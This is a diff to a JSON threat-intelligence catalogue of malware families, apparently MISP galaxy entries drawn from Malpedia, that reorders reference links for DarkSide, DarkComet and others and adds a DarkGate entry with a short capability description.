"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] 
@@ -20630,11 +21600,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot", "https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-lyceum", + "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", "https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/", "https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f", - "https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf", - "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf", - "https://www.youtube.com/watch?v=FttiysUZmDw" + "https://www.youtube.com/watch?v=FttiysUZmDw", + "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" ], "synonyms": [], "type": [] @@ -20647,11 +21617,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit", - "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md", - "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/", "https://twitter.com/luc4m/status/1626535098039271425", - "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/" + "https://blogs.blackberry.com/en/2023/02/darkbit-ransomware-targets-israel", + "https://www.microsoft.com/en-us/security/blog/2023/04/07/mercury-and-dev-1084-destructive-attack-on-hybrid-environment/", + "https://labs.k7computing.com/index.php/muddywater-back-with-darkbit/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware-Windows-DarkBit/README.md" ], "synonyms": [], "type": [] @@ -20664,6 +21634,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud", + "https://asec.ahnlab.com/en/53128/", "https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/" ], "synonyms": [], 
@@ -20677,26 +21648,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", - "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", - "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", - "https://content.fireeye.com/apt/rpt-apt38", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", - "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", - "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", - "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", - "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + 
"https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html", + "https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf", + "https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", + "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://content.fireeye.com/apt/rpt-apt38", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", + "https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Breut", 
@@ -20713,8 +21685,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew", - "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia", - "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/" + "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", + "https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia" ], "synonyms": [], "type": [] 
@@ -20735,6 +21707,32 @@ "uuid": "ccbc93b4-fd7a-4926-88f3-bcf5a1c530a5", "value": "DarkEye" }, + { + "description": "First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkgate", + "https://github.com/telekom-security/malware_analysis/blob/main/darkgate/extractor.py", + "https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams", + "https://decoded.avast.io/janrubin/meh-2-2/", + "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", + "https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/", + "https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/", + "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", + "https://decoded.avast.io/janrubin/complex-obfuscation-meh/", + "https://github.com/prodaft/malware-ioc/blob/master/PTI-66/DarkGate.md", + "https://medium.com/@DCSO_CyTec/shortandmalicious-darkgate-d9102a457232", + "https://github.security.telekom.com/2023/08/darkgate-loader.html" + ], + "synonyms": [ + "Meh" + ], + "type": [] + }, + "uuid": "977ef666-33b7-41d4-9d98-15ab0d16bede", + "value": "DarkGate" + }, { "description": "", "meta": { 
@@ -20794,8 +21792,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml", - "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", - "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html" + "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html" ], "synonyms": [ "Chymine" 
@@ -20864,130 +21862,131 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside", - "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", - "https://www.varonis.com/blog/darkside-ransomware/", - "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution", - "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack", - "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://www.secjuice.com/blue-team-detection-darkside-ransomware/", - "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/", - "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", - "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/", "https://www.secureworks.com/research/threat-profiles/gold-waterfall", - 
"https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", + "https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", + "https://twitter.com/embee_research/status/1678631524374020098?s=46", + "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/", + "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", + "https://brandefense.io/darkside-ransomware-analysis-report/", + "https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution", + "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", "https://unit42.paloaltonetworks.com/darkside-ransomware/", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + 
"https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://www.secjuice.com/blue-team-detection-darkside-ransomware/", + "https://www.acronis.com/en-us/articles/darkside-ransomware/", + "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", + "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/", + "https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack", + "https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", "https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/", + "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", + "https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/", + "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html", + "https://www.youtube.com/watch?v=NIiEcOryLpI", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/", + 
"https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://www.varonis.com/blog/darkside-ransomware/", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", "https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/", - "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf", - "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/", - "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", - "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", - "https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/", - "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/", - "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", - "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/", - "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", - "https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin", + 
"https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://zawadidone.nl/darkside-ransomware-analysis/", "https://asec.ahnlab.com/en/34549/", - "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware", + "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", "https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.acronis.com/en-us/articles/darkside-ransomware/", - "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/", - "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://www.ic3.gov/Media/News/2021/211101.pdf", - "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", - "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", - "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html", - 
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://twitter.com/ValthekOn/status/1422385890467491841?s=20", - "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#", - "https://brandefense.io/darkside-ransomware-analysis-report/", - "https://twitter.com/sysopfb/status/1422280887274639375", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", - "https://community.riskiq.com/article/fdf74f23", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", - "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", - "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/", - "https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6", - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://www.nozominetworks.com/blog/how-to-analyze-malware-for-technical-writing/", - "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/", - "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", - 
"https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside", - "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", - "https://us-cert.cisa.gov/ncas/alerts/aa21-131a", "https://www.glimps.fr/lockbit3-0/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", "https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", - "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", - "https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims", - "https://threatpost.com/guess-fashion-data-loss-ransomware/167754/", - "https://www.databreaches.net/a-chat-with-darkside/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.youtube.com/watch?v=qxPXxWMI2i4", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", - 
"https://github.com/sisoma2/malware_analysis/tree/master/blackmatter", - "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/", - "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware", + "https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://zawadidone.nl/darkside-ransomware-analysis/", + "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/", + "https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/", + "https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/", + "https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html", "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", - "https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", - "https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/", - "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a", + 
"https://www.databreaches.net/a-chat-with-darkside/", + "https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968", + "http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/", + "https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/", + "https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/", + "https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/", + "https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/", + "https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html", + "https://twitter.com/sysopfb/status/1422280887274639375", + "https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/", + "https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://community.riskiq.com/article/fdf74f23", + "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/", "https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/", - 
"https://therecord.media/popular-hacking-forum-bans-ransomware-ads/", - "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://github.com/sisoma2/malware_analysis/tree/master/blackmatter", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", + "https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside", + "https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/", + "https://twitter.com/ValthekOn/status/1422385890467491841?s=20", + "https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/", + "https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/", + "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", + "https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/", + "https://www.ic3.gov/Media/News/2021/211101.pdf", + 
"https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b", + "https://twitter.com/JAMESWT_MHT/status/1388301138437578757", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-131a", + "https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/", + "https://blog.group-ib.com/blackmatter#", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://blog.group-ib.com/blackmatter2", "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/", - "https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", - "https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf" + "https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf", + "https://www.metabaseq.com/recursos/inside-darkside-the-ransomware-that-attacked-colonial-pipeline#", + 
"https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/", + "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", + "https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/" ], "synonyms": [ "BlackMatter" @@ -21002,8 +22001,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", - "https://blog.radware.com/security/2018/02/darksky-botnet/", - "http://telegra.ph/Analiz-botneta-DarkSky-12-30" + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://blog.radware.com/security/2018/02/darksky-botnet/" ], "synonyms": [], "type": [] 
